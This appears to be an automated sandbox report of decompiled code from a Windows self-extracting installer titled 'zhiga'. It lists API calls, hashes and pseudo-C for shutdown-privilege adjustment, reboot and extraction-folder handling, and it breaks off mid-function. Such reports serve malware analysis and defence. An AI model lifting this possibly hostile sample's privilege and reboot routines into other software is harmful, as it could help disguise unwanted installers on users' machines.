                                                          0x01095e24
                                                          0x01095e24
                                                          0x01095e2c
                                                          0x01095e47
                                                          0x01095e4a
                                                          0x010961d2
                                                          0x010961e2
                                                          0x010961e7
                                                          0x010961ee
                                                          0x010961f1
                                                          0x010961f1
                                                          0x010961f8
                                                          0x010961f8
                                                          0x01095e50
                                                          0x01095e53
                                                          0x01096109
                                                          0x0109611f
                                                          0x00000000
                                                          0x01096125
                                                          0x01096137
                                                          0x0109613a
                                                          0x0109613c
                                                          0x0109613e
                                                          0x0109613e
                                                          0x01096141
                                                          0x01096141
                                                          0x01096143
                                                          0x01096144
                                                          0x0109614a
                                                          0x00000000
                                                          0x01096150
                                                          0x01096152
                                                          0x0109615c
                                                          0x01096170
                                                          0x01096172
                                                          0x0109617c
                                                          0x01096190
                                                          0x01096190
                                                          0x01096196
                                                          0x010961a5
                                                          0x00000000
                                                          0x010961ab
                                                          0x010961b9
                                                          0x010961c6
                                                          0x010961c6
                                                          0x0109617e
                                                          0x01096180
                                                          0x0109618a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0109618a
                                                          0x0109615e
                                                          0x01096160
                                                          0x0109616a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0109616a
                                                          0x0109615c
                                                          0x0109614a
                                                          0x0109610b
                                                          0x0109610e
                                                          0x0109610e
                                                          0x00000000
                                                          0x01095e59
                                                          0x01095e59
                                                          0x01095e5c
                                                          0x0109604f
                                                          0x01096056
                                                          0x00000000
                                                          0x0109605c
                                                          0x0109606e
                                                          0x01096071
                                                          0x01096073
                                                          0x01096075
                                                          0x01096075
                                                          0x01096078
                                                          0x01096078
                                                          0x0109607a
                                                          0x0109607b
                                                          0x01096081
                                                          0x00000000
                                                          0x01096087
                                                          0x01096087
                                                          0x0109608d
                                                          0x0109609c
                                                          0x00000000
                                                          0x010960a2
                                                          0x010960aa
                                                          0x010960b2
                                                          0x010960b7
                                                          0x010960bd
                                                          0x010960bf
                                                          0x010960bf
                                                          0x010960d6
                                                          0x010960e0
                                                          0x010960e7
                                                          0x010960f5
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010960f5
                                                          0x0109609c
                                                          0x01096081
                                                          0x01095e62
                                                          0x01095e62
                                                          0x01095e65
                                                          0x01095fd3
                                                          0x01095fe9
                                                          0x00000000
                                                          0x01095fef
                                                          0x01095fef
                                                          0x01095ff7
                                                          0x01095ffd
                                                          0x01096003
                                                          0x01096006
                                                          0x01096011
                                                          0x01096014
                                                          0x0109603d
                                                          0x01096016
                                                          0x01096018
                                                          0x01096019
                                                          0x0109601b
                                                          0x01096033
                                                          0x0109601d
                                                          0x01096020
                                                          0x01096029
                                                          0x01096022
                                                          0x01096022
                                                          0x01096022
                                                          0x01096020
                                                          0x0109601b
                                                          0x01096042
                                                          0x01096044
                                                          0x01096046
                                                          0x0109604a
                                                          0x01095ff7
                                                          0x01095fd5
                                                          0x01095fd8
                                                          0x01095fd8
                                                          0x00000000
                                                          0x01095e6b
                                                          0x01095e6b
                                                          0x01095e6e
                                                          0x01095f8b
                                                          0x01095f99
                                                          0x00000000
                                                          0x01095f9f
                                                          0x01095fa7
                                                          0x01095faf
                                                          0x00000000
                                                          0x01095fb1
                                                          0x01095fb3
                                                          0x00000000
                                                          0x01095fb5
                                                          0x01095fb7
                                                          0x00000000
                                                          0x01095fb9
                                                          0x00000000
                                                          0x01095fb9
                                                          0x01095fb7
                                                          0x01095fb3
                                                          0x01095faf
                                                          0x01095f8d
                                                          0x01095f8d
                                                          0x01095f8d
                                                          0x01095f8f
                                                          0x01095fc1
                                                          0x01095fc1
                                                          0x01095fc1
                                                          0x00000000
                                                          0x01095e74
                                                          0x01095e74
                                                          0x01095e77
                                                          0x01095ea0
                                                          0x01095ebd
                                                          0x01095f79
                                                          0x00000000
                                                          0x01095f7f
                                                          0x01095ec3
                                                          0x01095ec3
                                                          0x01095ecc
                                                          0x01095ed4
                                                          0x01095ed6
                                                          0x01095edc
                                                          0x01095edf
                                                          0x01095eea
                                                          0x01095eed
                                                          0x01095f3f
                                                          0x01095f40
                                                          0x00000000
                                                          0x01095eef
                                                          0x01095eef
                                                          0x01095ef2
                                                          0x01095f34
                                                          0x01095ef4
                                                          0x01095ef4
                                                          0x01095ef7
                                                          0x01095f2b
                                                          0x00000000
                                                          0x01095ef9
                                                          0x01095ef9
                                                          0x01095efc
                                                          0x01095f22
                                                          0x00000000
                                                          0x01095efe
                                                          0x01095eff
                                                          0x01095f02
                                                          0x01095f16
                                                          0x01095f04
                                                          0x01095f07
                                                          0x01095f0d
                                                          0x01095f46
                                                          0x01095f46
                                                          0x01095f09
                                                          0x01095f09
                                                          0x01095f09
                                                          0x01095f07
                                                          0x01095f02
                                                          0x01095efc
                                                          0x01095ef7
                                                          0x01095ef2
                                                          0x01095f4c
                                                          0x01095f4e
                                                          0x01095f50
                                                          0x01095f54
                                                          0x01095ed4
                                                          0x01095ea2
                                                          0x01095ea4
                                                          0x01095eaf
                                                          0x01095eaf
                                                          0x00000000
                                                          0x01095e79
                                                          0x01095e7d
                                                          0x00000000
                                                          0x01095e83
                                                          0x01095e83
                                                          0x01095e83
                                                          0x01095e85
                                                          0x01095e85
                                                          0x01095e8e
                                                          0x00000000
                                                          0x01095e94
                                                          0x00000000
                                                          0x01095e94
                                                          0x01095e8e
                                                          0x01095e7d
                                                          0x01095e77
                                                          0x01095e6e
                                                          0x01095e65
                                                          0x01095e5c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01095dd0
                                                          0x01095dd0
                                                          0x01095dd0
                                                          0x00000000
                                                          0x01095dd0
                                                          0x01095dce
                                                          0x01095dca
                                                          0x01095dba
                                                          0x00000000
                                                          0x01095d00
                                                          0x01095dd9
                                                          0x01095e04
                                                          0x010961fe
                                                          0x01095e0a
                                                          0x01095e0c
                                                          0x01095e17
                                                          0x01095e17
                                                          0x01095e04
                                                          0x01096200
                                                          0x01096200
                                                          0x00000000

                                                          APIs
                                                          • CharNextA.USER32(?,00000000,?,?), ref: 01095CEE
                                                          • GetModuleFileNameA.KERNEL32(01098B3E,00000104,00000000,?,?), ref: 01095DFC
                                                          • CharUpperA.USER32(?), ref: 01095E3E
                                                          • CharUpperA.USER32(-00000052), ref: 01095EE1
                                                          • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 01095F6F
                                                          • CharUpperA.USER32(?), ref: 01095FA7
                                                          • CharUpperA.USER32(-0000004E), ref: 01096008
                                                          • CharUpperA.USER32(?), ref: 010960AA
                                                          • CloseHandle.KERNEL32(00000000,01091140,00000000,00000040,00000000), ref: 010961F1
                                                          • ExitProcess.KERNEL32 ref: 010961F8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                          • String ID: "$"$:$RegServer
                                                          • API String ID: 1203814774-25366791
                                                          • Opcode ID: 538acd610305764a2c0f53fa1df6171693a23b637b73ad32ed2dd7fe441367f9
                                                          • Instruction ID: a0de85d0c2accb2227364881e6c72a7e23e74f4504cc3c7373709b1e13642114
                                                          • Opcode Fuzzy Hash: 538acd610305764a2c0f53fa1df6171693a23b637b73ad32ed2dd7fe441367f9
                                                          • Instruction Fuzzy Hash: 61D17E71A042495EEF778B3E8C783FA3FF1A706354F0481DBC6D6C6195D67A8982AB40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 60%
                                                          			E01091F90(signed int __ecx, void* __edi, void* __esi) {
                                                          				signed int _v8;
                                                          				int _v12;
                                                          				struct _TOKEN_PRIVILEGES _v24;
                                                          				void* _v28;
                                                          				void* __ebx;
                                                          				signed int _t13;
                                                          				int _t21;
                                                          				void* _t25;
                                                          				int _t28;
                                                          				signed char _t30;
                                                          				void* _t38;
                                                          				void* _t40;
                                                          				void* _t41;
                                                          				signed int _t46;
                                                          
                                                          				_t41 = __esi;
                                                          				_t38 = __edi;
                                                          				_t30 = __ecx;
                                                          				if((__ecx & 0x00000002) != 0) {
                                                          					L12:
                                                          					if((_t30 & 0x00000004) != 0) {
                                                          						L14:
                                                          						if( *0x1099a40 != 0) {
                                                          							_pop(_t30);
                                                          							_t44 = _t46;
                                                          							_t13 =  *0x1098004; // 0x8a9c601
                                                          							_v8 = _t13 ^ _t46;
                                                          							_push(_t38);
                                                          							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                          								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                          								_v24.PrivilegeCount = 1;
                                                          								_v12 = 2;
                                                          								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                          								CloseHandle(_v28);
                                                          								_t41 = _t41;
                                                          								_push(0);
                                                          								if(_t21 != 0) {
                                                          									if(ExitWindowsEx(2, ??) != 0) {
                                                          										_t25 = 1;
                                                          									} else {
                                                          										_t37 = 0x4f7;
                                                          										goto L3;
                                                          									}
                                                          								} else {
                                                          									_t37 = 0x4f6;
                                                          									goto L4;
                                                          								}
                                                          							} else {
                                                          								_t37 = 0x4f5;
                                                          								L3:
                                                          								_push(0);
                                                          								L4:
                                                          								_push(0x10);
                                                          								_push(0);
                                                          								_push(0);
                                                          								E010944B9(0, _t37);
                                                          								_t25 = 0;
                                                          							}
                                                          							_pop(_t40);
                                                          							return E01096CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                          						} else {
                                                          							_t28 = ExitWindowsEx(2, 0);
                                                          							goto L16;
                                                          						}
                                                          					} else {
                                                          						_t37 = 0x522;
                                                          						_t28 = E010944B9(0, 0x522, 0x1091140, 0, 0x40, 4);
                                                          						if(_t28 != 6) {
                                                          							goto L16;
                                                          						} else {
                                                          							goto L14;
                                                          						}
                                                          					}
                                                          				} else {
                                                          					__eax = E01091EA7(__ecx);
                                                          					if(__eax != 2) {
                                                          						L16:
                                                          						return _t28;
                                                          					} else {
                                                          						goto L12;
                                                          					}
                                                          				}
                                                          			}

















                                                          0x01091f90
                                                          0x01091f90
                                                          0x01091f93
                                                          0x01091f98
                                                          0x01091fa4
                                                          0x01091fa7
                                                          0x01091fc5
                                                          0x01091fcd
                                                          0x01091fdb
                                                          0x01091ee5
                                                          0x01091eea
                                                          0x01091ef1
                                                          0x01091ef4
                                                          0x01091f0c
                                                          0x01091f2e
                                                          0x01091f3a
                                                          0x01091f46
                                                          0x01091f4d
                                                          0x01091f58
                                                          0x01091f60
                                                          0x01091f61
                                                          0x01091f62
                                                          0x01091f75
                                                          0x01091f80
                                                          0x01091f77
                                                          0x01091f77
                                                          0x00000000
                                                          0x01091f77
                                                          0x01091f64
                                                          0x01091f64
                                                          0x00000000
                                                          0x01091f64
                                                          0x01091f0e
                                                          0x01091f0e
                                                          0x01091f13
                                                          0x01091f13
                                                          0x01091f14
                                                          0x01091f14
                                                          0x01091f16
                                                          0x01091f17
                                                          0x01091f1a
                                                          0x01091f1f
                                                          0x01091f1f
                                                          0x01091f86
                                                          0x01091f8f
                                                          0x01091fcf
                                                          0x01091fd3
                                                          0x00000000
                                                          0x01091fd3
                                                          0x01091fa9
                                                          0x01091fb4
                                                          0x01091fbb
                                                          0x01091fc3
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01091fc3
                                                          0x01091f9a
                                                          0x01091f9a
                                                          0x01091fa2
                                                          0x01091fd9
                                                          0x01091fda
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01091fa2

                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 01091EFB
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 01091F02
                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 01091FD3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Process$CurrentExitOpenTokenWindows
                                                          • String ID: SeShutdownPrivilege
                                                          • API String ID: 2795981589-3733053543
                                                          • Opcode ID: 9982898be80a59aa2750943d4136e88240118f89c7516d6ce895502c5e1e2349
                                                          • Instruction ID: 7f9f84be964a01865d7f751de8b14f3f790b43a9c41c328f1218909e3f5c9e7e
                                                          • Opcode Fuzzy Hash: 9982898be80a59aa2750943d4136e88240118f89c7516d6ce895502c5e1e2349
                                                          • Instruction Fuzzy Hash: 9321E7B1B4020ABBDF315AA59C79FBF76B8EBC5B60F100059FA82D61C5D77A8401A361
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E01096CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                          
                                                          				SetUnhandledExceptionFilter(0);
                                                          				UnhandledExceptionFilter(_a4);
                                                          				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                          			}



                                                          0x01096cf7
                                                          0x01096d00
                                                          0x01096d19

                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,01096E26,01091000), ref: 01096CF7
                                                          • UnhandledExceptionFilter.KERNEL32(01096E26,?,01096E26,01091000), ref: 01096D00
                                                          • GetCurrentProcess.KERNEL32(C0000409,?,01096E26,01091000), ref: 01096D0B
                                                          • TerminateProcess.KERNEL32(00000000,?,01096E26,01091000), ref: 01096D12
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                          • String ID:
                                                          • API String ID: 3231755760-0
                                                          • Opcode ID: 7f3d20d158bfdcdf2d592b89497915707de2543b6209d3c6a602b09be30d5fd3
                                                          • Instruction ID: 74ad287f58c5bc90812a61761bd8861331637dc1245e21412c7389a8d6458873
                                                          • Opcode Fuzzy Hash: 7f3d20d158bfdcdf2d592b89497915707de2543b6209d3c6a602b09be30d5fd3
                                                          • Instruction Fuzzy Hash: 4AD012B2200108FBDB202BF1F82CA593F28FB88392F444000F35D83014CB3B4451CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 76%
                                                          			E01093210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                          				void* __edi;
                                                          				void* _t6;
                                                          				void* _t10;
                                                          				int _t20;
                                                          				int _t21;
                                                          				int _t23;
                                                          				char _t24;
                                                          				long _t25;
                                                          				int _t27;
                                                          				int _t30;
                                                          				void* _t32;
                                                          				int _t33;
                                                          				int _t34;
                                                          				int _t37;
                                                          				int _t38;
                                                          				int _t39;
                                                          				void* _t42;
                                                          				void* _t46;
                                                          				CHAR* _t49;
                                                          				void* _t58;
                                                          				void* _t63;
                                                          				struct HWND__* _t64;
                                                          
                                                          				_t64 = _a4;
                                                          				_t6 = _a8 - 0x10;
                                                          				if(_t6 == 0) {
                                                          					_push(0);
                                                          					L38:
                                                          					EndDialog(_t64, ??);
                                                          					L39:
                                                          					__eflags = 1;
                                                          					return 1;
                                                          				}
                                                          				_t42 = 1;
                                                          				_t10 = _t6 - 0x100;
                                                          				if(_t10 == 0) {
                                                          					E010943D0(_t64, GetDesktopWindow());
                                                          					SetWindowTextA(_t64, "zhiga");
                                                          					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                          					__eflags =  *0x1099a40 - _t42; // 0x3
                                                          					if(__eflags == 0) {
                                                          						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                          					}
                                                          					L36:
                                                          					return _t42;
                                                          				}
                                                          				if(_t10 == _t42) {
                                                          					_t20 = _a12 - 1;
                                                          					__eflags = _t20;
                                                          					if(_t20 == 0) {
                                                          						_t21 = GetDlgItemTextA(_t64, 0x835, 0x10991e4, 0x104);
                                                          						__eflags = _t21;
                                                          						if(_t21 == 0) {
                                                          							L32:
                                                          							_t58 = 0x4bf;
                                                          							_push(0);
                                                          							_push(0x10);
                                                          							_push(0);
                                                          							_push(0);
                                                          							L25:
                                                          							E010944B9(_t64, _t58);
                                                          							goto L39;
                                                          						}
                                                          						_t49 = 0x10991e4;
                                                          						do {
                                                          							_t23 =  *_t49;
                                                          							_t49 =  &(_t49[1]);
                                                          							__eflags = _t23;
                                                          						} while (_t23 != 0);
                                                          						__eflags = _t49 - 0x10991e5 - 3;
                                                          						if(_t49 - 0x10991e5 < 3) {
                                                          							goto L32;
                                                          						}
                                                          						_t24 =  *0x10991e5; // 0x3a
                                                          						__eflags = _t24 - 0x3a;
                                                          						if(_t24 == 0x3a) {
                                                          							L21:
                                                          							_t25 = GetFileAttributesA(0x10991e4);
                                                          							__eflags = _t25 - 0xffffffff;
                                                          							if(_t25 != 0xffffffff) {
                                                          								L26:
                                                          								E0109658A(0x10991e4, 0x104, 0x1091140);
                                                          								_t27 = E010958C8(0x10991e4);
                                                          								__eflags = _t27;
                                                          								if(_t27 != 0) {
                                                          									__eflags =  *0x10991e4 - 0x5c;
                                                          									if( *0x10991e4 != 0x5c) {
                                                          										L30:
                                                          										_t30 = E0109597D(0x10991e4, 1, _t64, 1);
                                                          										__eflags = _t30;
                                                          										if(_t30 == 0) {
                                                          											L35:
                                                          											_t42 = 1;
                                                          											__eflags = 1;
                                                          											goto L36;
                                                          										}
                                                          										L31:
                                                          										_t42 = 1;
                                                          										EndDialog(_t64, 1);
                                                          										goto L36;
                                                          									}
                                                          									__eflags =  *0x10991e5 - 0x5c;
                                                          									if( *0x10991e5 == 0x5c) {
                                                          										goto L31;
                                                          									}
                                                          									goto L30;
                                                          								}
                                                          								_push(0);
                                                          								_push(0x10);
                                                          								_push(0);
                                                          								_push(0);
                                                          								_t58 = 0x4be;
                                                          								goto L25;
                                                          							}
                                                          							_t32 = E010944B9(_t64, 0x54a, 0x10991e4, 0, 0x20, 4);
                                                          							__eflags = _t32 - 6;
                                                          							if(_t32 != 6) {
                                                          								goto L35;
                                                          							}
                                                          							_t33 = CreateDirectoryA(0x10991e4, 0);
                                                          							__eflags = _t33;
                                                          							if(_t33 != 0) {
                                                          								goto L26;
                                                          							}
                                                          							_push(0);
                                                          							_push(0x10);
                                                          							_push(0);
                                                          							_push(0x10991e4);
                                                          							_t58 = 0x4cb;
                                                          							goto L25;
                                                          						}
                                                          						__eflags =  *0x10991e4 - 0x5c;
                                                          						if( *0x10991e4 != 0x5c) {
                                                          							goto L32;
                                                          						}
                                                          						__eflags = _t24 - 0x5c;
                                                          						if(_t24 != 0x5c) {
                                                          							goto L32;
                                                          						}
                                                          						goto L21;
                                                          					}
                                                          					_t34 = _t20 - 1;
                                                          					__eflags = _t34;
                                                          					if(_t34 == 0) {
                                                          						EndDialog(_t64, 0);
                                                          						 *0x1099124 = 0x800704c7;
                                                          						goto L39;
                                                          					}
                                                          					__eflags = _t34 != 0x834;
                                                          					if(_t34 != 0x834) {
                                                          						goto L36;
                                                          					}
                                                          					_t37 = LoadStringA( *0x1099a3c, 0x3e8, 0x1098598, 0x200);
                                                          					__eflags = _t37;
                                                          					if(_t37 != 0) {
                                                          						_t38 = E01094224(_t64, _t46, _t46);
                                                          						__eflags = _t38;
                                                          						if(_t38 == 0) {
                                                          							goto L36;
                                                          						}
                                                          						_t39 = SetDlgItemTextA(_t64, 0x835, 0x10987a0);
                                                          						__eflags = _t39;
                                                          						if(_t39 != 0) {
                                                          							goto L36;
                                                          						}
                                                          						_t63 = 0x4c0;
                                                          						L9:
                                                          						E010944B9(_t64, _t63, 0, 0, 0x10, 0);
                                                          						_push(0);
                                                          						goto L38;
                                                          					}
                                                          					_t63 = 0x4b1;
                                                          					goto L9;
                                                          				}
                                                          				return 0;
                                                          			}

























                                                          0x0109321b
                                                          0x0109321e
                                                          0x01093221
                                                          0x0109343c
                                                          0x0109343e
                                                          0x0109343f
                                                          0x01093445
                                                          0x01093447
                                                          0x00000000
                                                          0x01093447
                                                          0x01093229
                                                          0x0109322a
                                                          0x0109322f
                                                          0x010933ec
                                                          0x010933f7
                                                          0x01093410
                                                          0x01093416
                                                          0x0109341d
                                                          0x0109342d
                                                          0x0109342d
                                                          0x01093438
                                                          0x00000000
                                                          0x01093438
                                                          0x01093237
                                                          0x01093243
                                                          0x01093243
                                                          0x01093246
                                                          0x010932ee
                                                          0x010932f4
                                                          0x010932f6
                                                          0x010933d4
                                                          0x010933d6
                                                          0x010933db
                                                          0x010933dc
                                                          0x010933de
                                                          0x010933df
                                                          0x01093370
                                                          0x01093372
                                                          0x00000000
                                                          0x01093372
                                                          0x010932fc
                                                          0x01093301
                                                          0x01093301
                                                          0x01093303
                                                          0x01093304
                                                          0x01093304
                                                          0x0109330a
                                                          0x0109330d
                                                          0x00000000
                                                          0x00000000
                                                          0x01093313
                                                          0x01093318
                                                          0x0109331a
                                                          0x01093331
                                                          0x01093332
                                                          0x0109333a
                                                          0x0109333d
                                                          0x0109337c
                                                          0x01093388
                                                          0x0109338f
                                                          0x01093394
                                                          0x01093396
                                                          0x010933a4
                                                          0x010933ab
                                                          0x010933b6
                                                          0x010933be
                                                          0x010933c3
                                                          0x010933c5
                                                          0x01093435
                                                          0x01093437
                                                          0x01093437
                                                          0x00000000
                                                          0x01093437
                                                          0x010933c7
                                                          0x010933c9
                                                          0x010933cc
                                                          0x00000000
                                                          0x010933cc
                                                          0x010933ad
                                                          0x010933b4
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010933b4
                                                          0x01093398
                                                          0x01093399
                                                          0x0109339b
                                                          0x0109339c
                                                          0x0109339d
                                                          0x00000000
                                                          0x0109339d
                                                          0x0109334c
                                                          0x01093351
                                                          0x01093354
                                                          0x00000000
                                                          0x00000000
                                                          0x0109335c
                                                          0x01093362
                                                          0x01093364
                                                          0x00000000
                                                          0x00000000
                                                          0x01093366
                                                          0x01093367
                                                          0x01093369
                                                          0x0109336a
                                                          0x0109336b
                                                          0x00000000
                                                          0x0109336b
                                                          0x0109331c
                                                          0x01093323
                                                          0x00000000
                                                          0x00000000
                                                          0x01093329
                                                          0x0109332b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0109332b
                                                          0x0109324c
                                                          0x0109324c
                                                          0x0109324f
                                                          0x010932c8
                                                          0x010932ce
                                                          0x00000000
                                                          0x010932ce
                                                          0x01093251
                                                          0x01093256
                                                          0x00000000
                                                          0x00000000
                                                          0x01093271
                                                          0x01093277
                                                          0x01093279
                                                          0x01093298
                                                          0x0109329d
                                                          0x0109329f
                                                          0x00000000
                                                          0x00000000
                                                          0x010932b0
                                                          0x010932b6
                                                          0x010932b8
                                                          0x00000000
                                                          0x00000000
                                                          0x010932be
                                                          0x01093280
                                                          0x01093289
                                                          0x0109328e
                                                          0x00000000
                                                          0x0109328e
                                                          0x0109327b
                                                          0x00000000
                                                          0x0109327b
                                                          0x00000000

                                                          APIs
                                                          • LoadStringA.USER32(000003E8,01098598,00000200), ref: 01093271
                                                          • GetDesktopWindow.USER32 ref: 010933E2
                                                          • SetWindowTextA.USER32(?,zhiga), ref: 010933F7
                                                          • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 01093410
                                                          • GetDlgItem.USER32(?,00000836), ref: 01093426
                                                          • EnableWindow.USER32(00000000), ref: 0109342D
                                                          • EndDialog.USER32(?,00000000), ref: 0109343F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$zhiga
                                                          • API String ID: 2418873061-3661535512
                                                          • Opcode ID: d7253111f48baeb1cfe3fcd44e52a15993aafbb321eb4a62f3c80324a021823a
                                                          • Instruction ID: a7f012a3250c858299b0afed8062bd8055a93363132639cb32992a5cac8480cc
                                                          • Opcode Fuzzy Hash: d7253111f48baeb1cfe3fcd44e52a15993aafbb321eb4a62f3c80324a021823a
                                                          • Instruction Fuzzy Hash: AE51E570381240B6EF725A395C7CFBF2D99BB46B54F008068F6C59A1C5DEA99801BB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 93%
                                                          			E01092CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t13;
                                                          				void* _t20;
                                                          				void* _t23;
                                                          				void* _t27;
                                                          				struct HRSRC__* _t31;
                                                          				intOrPtr _t33;
                                                          				void* _t43;
                                                          				void* _t48;
                                                          				signed int _t65;
                                                          				struct HINSTANCE__* _t66;
                                                          				signed int _t67;
                                                          
                                                          				_t13 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t13 ^ _t67;
                                                          				_t65 = 0;
                                                          				_t66 = __ecx;
                                                          				_t48 = __edx;
                                                          				 *0x1099a3c = __ecx;
                                                          				memset(0x1099140, 0, 0x8fc);
                                                          				memset(0x1098a20, 0, 0x32c);
                                                          				memset(0x10988c0, 0, 0x104);
                                                          				 *0x10993ec = 1;
                                                          				_t20 = E0109468F("TITLE", 0x1099154, 0x7f);
                                                          				if(_t20 == 0 || _t20 > 0x80) {
                                                          					_t64 = 0x4b1;
                                                          					goto L32;
                                                          				} else {
                                                          					_t27 = CreateEventA(0, 1, 1, 0);
                                                          					 *0x109858c = _t27;
                                                          					SetEvent(_t27);
                                                          					_t64 = 0x1099a34;
                                                          					if(E0109468F("EXTRACTOPT", 0x1099a34, 4) != 0) {
                                                          						if(( *0x1099a34 & 0x000000c0) == 0) {
                                                          							L12:
                                                          							 *0x1099120 =  *0x1099120 & _t65;
                                                          							if(E01095C9E(_t48, _t48, _t65, _t66) != 0) {
                                                          								if( *0x1098a3a == 0) {
                                                          									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                          									if(_t31 != 0) {
                                                          										_t65 = LoadResource(_t66, _t31);
                                                          									}
                                                          									if( *0x1098184 != 0) {
                                                          										__imp__#17();
                                                          									}
                                                          									if( *0x1098a24 == 0) {
                                                          										_t57 = _t65;
                                                          										if(E010936EE(_t65) == 0) {
                                                          											goto L33;
                                                          										} else {
                                                          											_t33 =  *0x1099a40; // 0x3
                                                          											_t48 = 1;
                                                          											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                          												if(( *0x1099a34 & 0x00000100) == 0 || ( *0x1098a38 & 0x00000001) != 0 || E010918A3(_t64, _t66) != 0) {
                                                          													goto L30;
                                                          												} else {
                                                          													_t64 = 0x7d6;
                                                          													if(E01096517(_t57, 0x7d6, _t34, E010919E0, 0x547, 0x83e) != 0x83d) {
                                                          														goto L33;
                                                          													} else {
                                                          														goto L30;
                                                          													}
                                                          												}
                                                          											} else {
                                                          												L30:
                                                          												_t23 = _t48;
                                                          											}
                                                          										}
                                                          									} else {
                                                          										_t23 = 1;
                                                          									}
                                                          								} else {
                                                          									E01092390(0x1098a3a);
                                                          									goto L33;
                                                          								}
                                                          							} else {
                                                          								_t64 = 0x520;
                                                          								L32:
                                                          								E010944B9(0, _t64, 0, 0, 0x10, 0);
                                                          								goto L33;
                                                          							}
                                                          						} else {
                                                          							_t64 =  &_v268;
